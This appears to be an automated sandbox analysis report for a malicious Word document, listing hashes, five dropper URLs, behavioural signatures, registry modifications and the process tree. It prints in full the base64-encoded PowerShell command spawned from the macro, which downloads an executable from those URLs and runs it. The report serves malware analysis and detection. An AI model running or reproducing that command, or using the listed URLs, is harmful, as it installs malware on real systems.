f794639d67379bfe9c95c945acab77981d8f44fc8d75e2566e09aaff420cb280

General

Target

Y_44605116.doc
Size

175KB
MD5

f8ab6670f00a035e68134a7fd4dcb264
SHA1

0fd60d0c821d6aa014171a05b7678a21b05056fe
SHA256

f794639d67379bfe9c95c945acab77981d8f44fc8d75e2566e09aaff420cb280
SHA512

f4f48f82ec065a0e7aaa2ae57eceeaead5b5ad7ff49b73cbaf332bf5329888714a8819aa64a95aabdec6471596f299d2a2c20e4557425e4da722d99cdbe5e45c
SSDEEP

3072:V4PrXcuQuvpzm4bkiaMQgAlSzgFFaMtUKIM0+oy3aQ6GamQlRQ:iDRv1m4bnQgISzgF1tU7M0+oy3aQ6GaC

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://www.greaudstudio.com/docs/olohz_suq_munasyr/

exe.dropper

http://www.gravelrecords.com/wp-admin/5h_jns_l3s6/

exe.dropper

http://gtsouth.com/drinkmenu/38vq_z8al_r5cujfy90n/

exe.dropper

http://groncrete.com/bower_components/cvbh8_f0_84rai/

exe.dropper

http://www.gunesoluk.com/eotps/heb_x_1ehlbx9/

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powersheLL.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1972	1900	powersheLL.exe

Blocklisted process makes network request 2 IoCs

Processes:

powersheLL.exe

flow pid process

5 1972 powersheLL.exe
6 1972 powersheLL.exe

flow	pid	process
5	1972	powersheLL.exe
6	1972	powersheLL.exe

Drops file in System32 directory 1 IoCs

Processes:

powersheLL.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powersheLL.exe

Drops file in Windows directory 1 IoCs

Processes:

WINWORD.EXE

description ioc process

File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE
Office loads VBA resources, possible macro or embedded object present

description	ioc	process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

Modifies Internet Explorer settings 1 TTPs 31 IoCs

adware spyware

Modify Registry

T1112

Processes:

WINWORD.EXE

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3950455397-3229124517-1686476975-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3950455397-3229124517-1686476975-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3950455397-3229124517-1686476975-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3950455397-3229124517-1686476975-1000\Software\Microsoft\Internet Explorer\MenuExt	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3950455397-3229124517-1686476975-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3950455397-3229124517-1686476975-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3950455397-3229124517-1686476975-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3950455397-3229124517-1686476975-1000\Software\Microsoft\Internet Explorer\Toolbar	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3950455397-3229124517-1686476975-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE

Modifies registry class 64 IoCs

Processes:

WINWORD.EXE

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{6F368C03-9667-4E19-B814-2B872253829F}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3950455397-3229124517-1686476975-1000_CLASSES\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3950455397-3229124517-1686476975-1000_CLASSES\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}\ = "Tabs"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3950455397-3229124517-1686476975-1000_CLASSES\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3950455397-3229124517-1686476975-1000_CLASSES\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3950455397-3229124517-1686476975-1000_CLASSES\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcText"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3950455397-3229124517-1686476975-1000_CLASSES\Wow6432Node\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3950455397-3229124517-1686476975-1000_CLASSES\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3950455397-3229124517-1686476975-1000_CLASSES\Wow6432Node\Interface\{4C599243-6926-101B-9992-00000B65C6F9}	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3950455397-3229124517-1686476975-1000_CLASSES\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents10"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3950455397-3229124517-1686476975-1000_CLASSES\Wow6432Node\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}\ = "MdcListEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3950455397-3229124517-1686476975-1000_CLASSES\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}\ = "MdcCheckBoxEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3950455397-3229124517-1686476975-1000_CLASSES\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3950455397-3229124517-1686476975-1000_CLASSES\TypeLib	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3950455397-3229124517-1686476975-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3950455397-3229124517-1686476975-1000_CLASSES\Wow6432Node\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}\ = "MdcTextEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\ = "&Print"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3950455397-3229124517-1686476975-1000_CLASSES\Wow6432Node\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\ = "&Edit"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3950455397-3229124517-1686476975-1000_CLASSES\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}\ = "IReturnSingle"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3950455397-3229124517-1686476975-1000_CLASSES\Wow6432Node\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\htmlfile	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3950455397-3229124517-1686476975-1000_CLASSES\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3950455397-3229124517-1686476975-1000_CLASSES\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}\ = "ILabelControl"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3950455397-3229124517-1686476975-1000_CLASSES\Wow6432Node\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3950455397-3229124517-1686476975-1000_CLASSES\Wow6432Node\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon\ = "\"%1\""	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3950455397-3229124517-1686476975-1000_CLASSES\Wow6432Node\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLCheckbox"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3950455397-3229124517-1686476975-1000_CLASSES\TypeLib\{6F368C03-9667-4E19-B814-2B872253829F}\2.0\0	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3950455397-3229124517-1686476975-1000_CLASSES\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}\ = "_UserForm"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3950455397-3229124517-1686476975-1000_CLASSES\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLText"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3950455397-3229124517-1686476975-1000_CLASSES\Wow6432Node\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3950455397-3229124517-1686476975-1000_CLASSES\TypeLib\{6F368C03-9667-4E19-B814-2B872253829F}\2.0\0\win32	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3950455397-3229124517-1686476975-1000_CLASSES\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3950455397-3229124517-1686476975-1000_CLASSES\Wow6432Node\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3950455397-3229124517-1686476975-1000_CLASSES\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3950455397-3229124517-1686476975-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3950455397-3229124517-1686476975-1000_CLASSES\Wow6432Node\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3950455397-3229124517-1686476975-1000_CLASSES\Wow6432Node\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCombo"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3950455397-3229124517-1686476975-1000_CLASSES\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}\ = "IPage"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ThreadingModel = "Apartment"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3950455397-3229124517-1686476975-1000_CLASSES\Wow6432Node\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3950455397-3229124517-1686476975-1000_CLASSES\Wow6432Node\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3950455397-3229124517-1686476975-1000_CLASSES\Wow6432Node\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3950455397-3229124517-1686476975-1000_CLASSES\Wow6432Node\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3950455397-3229124517-1686476975-1000_CLASSES\Wow6432Node\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

824 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powersheLL.exe

pid process

1972 powersheLL.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powersheLL.exe

description pid process

Token: SeDebugPrivilege 1972 powersheLL.exe
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

WINWORD.EXE

pid process

824 WINWORD.EXE
824 WINWORD.EXE

pid	process
824	WINWORD.EXE

pid	process
1972	powersheLL.exe

description	pid	process
Token: SeDebugPrivilege	1972	powersheLL.exe

pid	process
824	WINWORD.EXE
824	WINWORD.EXE

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Y_44605116.doc"
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:824

C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
powersheLL -e JABOAFoAQwBSAE8AeQBoAGkAPQAnAFoAQQBHAFEASABuAHYAYwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAYwBgAFUAcgBJAFQAeQBgAFAAUgBvAGAAVABPAGMAYABvAEwAIgAgAD0AIAAnAHQAbABzADEAMgAsACAAdABsAHMAMQAxACwAIAB0AGwAcwAnADsAJABTAFkAQQBTAEcAdQBlAGEAIAA9ACAAJwA1ADgAMwAnADsAJABHAEkASABFAFUAZgBoAGEAPQAnAEYAUABGAFYASABsAGQAegAnADsAJABRAE8ATQBOAFMAYgBlAGcAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAFMAWQBBAFMARwB1AGUAYQArACcALgBlAHgAZQAnADsAJABaAEEATgBGAEoAbwBmAGYAPQAnAEIAUgBOAFcARABmAHUAdQAnADsAJABBAE8AQwBZAE0AcwB0AGQAPQAuACgAJwBuAGUAJwArACcAdwAtAG8AJwArACcAYgBqACcAKwAnAGUAYwB0ACcAKQAgAE4ARQBUAC4AdwBFAGIAYwBMAEkAZQBOAFQAOwAkAFQAQQBKAEoAQQBsAHoAegA9ACcAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAGcAcgBlAGEAdQBkAHMAdAB1AGQAaQBvAC4AYwBvAG0ALwBkAG8AYwBzAC8AbwBsAG8AaAB6AF8AcwB1AHEAXwBtAHUAbgBhAHMAeQByAC8AKgBoAHQAdABwADoALwAvAHcAdwB3AC4AZwByAGEAdgBlAGwAcgBlAGMAbwByAGQAcwAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8ANQBoAF8AagBuAHMAXwBsADMAcwA2AC8AKgBoAHQAdABwADoALwAvAGcAdABzAG8AdQB0AGgALgBjAG8AbQAvAGQAcgBpAG4AawBtAGUAbgB1AC8AMwA4AHYAcQBfAHoAOABhAGwAXwByADUAYwB1AGoAZgB5ADkAMABuAC8AKgBoAHQAdABwADoALwAvAGcAcgBvAG4AYwByAGUAdABlAC4AYwBvAG0ALwBiAG8AdwBlAHIAXwBjAG8AbQBwAG8AbgBlAG4AdABzAC8AYwB2AGIAaAA4AF8AZgAwAF8AOAA0AHIAYQBpAC8AKgBoAHQAdABwADoALwAvAHcAdwB3AC4AZwB1AG4AZQBzAG8AbAB1AGsALgBjAG8AbQAvAGUAbwB0AHAAcwAvAGgAZQBiAF8AeABfADEAZQBoAGwAYgB4ADkALwAnAC4AIgBTAGAAcABMAGkAdAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAEcAVgBIAE0ARwB4AHAAZAA9ACcAVQBGAFkARgBFAG4AYgBkACcAOwBmAG8AcgBlAGEAYwBoACgAJABYAFcAQQBBAEkAbABxAHoAIABpAG4AIAAkAFQAQQBKAEoAQQBsAHoAegApAHsAdAByAHkAewAkAEEATwBDAFkATQBzAHQAZAAuACIARABgAG8AdwBOAGwATwBgAEEAYABEAGYAaQBMAGUAIgAoACQAWABXAEEAQQBJAGwAcQB6ACwAIAAkAFEATwBNAE4AUwBiAGUAZwApADsAJABXAEEAWgBTAFkAcABmAGcAPQAnAEYASQBMAEEAQQBuAHUAdwAnADsASQBmACAAKAAoAC4AKAAnAEcAZQB0ACcAKwAnAC0ASQB0AGUAbQAnACkAIAAkAFEATwBNAE4AUwBiAGUAZwApAC4AIgBsAGAARQBOAGAAZwBUAEgAIgAgAC0AZwBlACAAMgAzADQAMwAwACkAIAB7ACgAWwB3AG0AaQBjAGwAYQBzAHMAXQAnAHcAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMAJwApAC4AIgBDAFIAYABFAEEAVABlACIAKAAkAFEATwBNAE4AUwBiAGUAZwApADsAJABNAFQAUQBQAEYAcgBsAHoAPQAnAFYATgBBAFUAQQBxAHkAdAAnADsAYgByAGUAYQBrADsAJABOAFcAUwBIAEEAbwBqAHUAPQAnAFQARQBLAEwASABpAHAAcQAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABGAEwAVQBCAE4AcABkAGsAPQAnAEUATwBMAEoAQwB1AGQAagAnAA==
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1972

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

Filesize
20KB

MD5
e91af9b7105790a872715d206e1490f2

SHA1
d1554135fb459bd9ef38ab0a382ca7ba4e71c8eb

SHA256
8cc756398671e507f77e3ea56840262c2668d070c708ad9780f6491d93889141

SHA512
adb18d21e6dcb94c2374f46a5bd66e2142ea6e70a54acc41944de6def60c84937ebd965676976b464f1f3e49eef9c28495be4ee0448a6879cee52626e0c4870f

Download Submit
memory/824-76-0x00000000004B0000-0x00000000005B0000-memory.dmp

Filesize
1024KB

Download
memory/824-63-0x00000000004B0000-0x00000000005B0000-memory.dmp

Filesize
1024KB

Download
memory/824-79-0x00000000004B0000-0x00000000005B0000-memory.dmp

Filesize
1024KB

Download
memory/824-54-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/824-62-0x00000000004B0000-0x00000000005B0000-memory.dmp

Filesize
1024KB

Download
memory/824-61-0x00000000004B0000-0x00000000005B0000-memory.dmp

Filesize
1024KB

Download
memory/824-64-0x00000000004B0000-0x00000000005B0000-memory.dmp

Filesize
1024KB

Download
memory/824-65-0x00000000004B0000-0x00000000005B0000-memory.dmp

Filesize
1024KB

Download
memory/824-66-0x00000000004B0000-0x00000000005B0000-memory.dmp

Filesize
1024KB

Download
memory/824-67-0x00000000004B0000-0x00000000005B0000-memory.dmp

Filesize
1024KB

Download
memory/824-72-0x00000000004B0000-0x00000000005B0000-memory.dmp

Filesize
1024KB

Download
memory/824-73-0x00000000004B0000-0x00000000005B0000-memory.dmp

Filesize
1024KB

Download
memory/824-75-0x00000000004B0000-0x00000000005B0000-memory.dmp

Filesize
1024KB

Download
memory/824-74-0x00000000004B0000-0x00000000005B0000-memory.dmp

Filesize
1024KB

Download
memory/824-77-0x00000000004B0000-0x00000000005B0000-memory.dmp

Filesize
1024KB

Download
memory/824-78-0x00000000004B0000-0x00000000005B0000-memory.dmp

Filesize
1024KB

Download
memory/824-60-0x00000000004B0000-0x00000000005B0000-memory.dmp

Filesize
1024KB

Download
memory/824-81-0x00000000004B0000-0x00000000005B0000-memory.dmp

Filesize
1024KB

Download
memory/824-59-0x00000000004B0000-0x00000000005B0000-memory.dmp

Filesize
1024KB

Download
memory/824-80-0x00000000004B0000-0x00000000005B0000-memory.dmp

Filesize
1024KB

Download
memory/824-82-0x00000000004B0000-0x00000000005B0000-memory.dmp

Filesize
1024KB

Download
memory/824-83-0x00000000004B0000-0x00000000005B0000-memory.dmp

Filesize
1024KB

Download
memory/824-117-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/824-58-0x00000000004B0000-0x00000000005B0000-memory.dmp

Filesize
1024KB

Download
memory/1972-91-0x000000001B3A0000-0x000000001B682000-memory.dmp

Filesize
2.9MB

Download
memory/1972-92-0x0000000001F40000-0x0000000001F48000-memory.dmp

Filesize
32KB

Download
memory/1972-93-0x00000000027E0000-0x0000000002860000-memory.dmp

Filesize
512KB

Download
memory/1972-94-0x00000000027E0000-0x0000000002860000-memory.dmp

Filesize
512KB

Download
memory/1972-95-0x00000000027E0000-0x0000000002860000-memory.dmp

Filesize
512KB

Download
memory/1972-96-0x00000000027E0000-0x0000000002860000-memory.dmp

Filesize
512KB

Download
memory/1972-97-0x00000000027E0000-0x0000000002860000-memory.dmp

Filesize
512KB

Download
memory/1972-98-0x00000000027E0000-0x0000000002860000-memory.dmp

Filesize
512KB

Download
memory/1972-99-0x00000000027E0000-0x0000000002860000-memory.dmp

Filesize
512KB

Download
memory/1972-100-0x00000000027E0000-0x0000000002860000-memory.dmp

Filesize
512KB

Download
memory/1972-90-0x00000000027E0000-0x0000000002860000-memory.dmp

Filesize
512KB

Download
memory/1972-89-0x00000000027E0000-0x0000000002860000-memory.dmp

Filesize
512KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads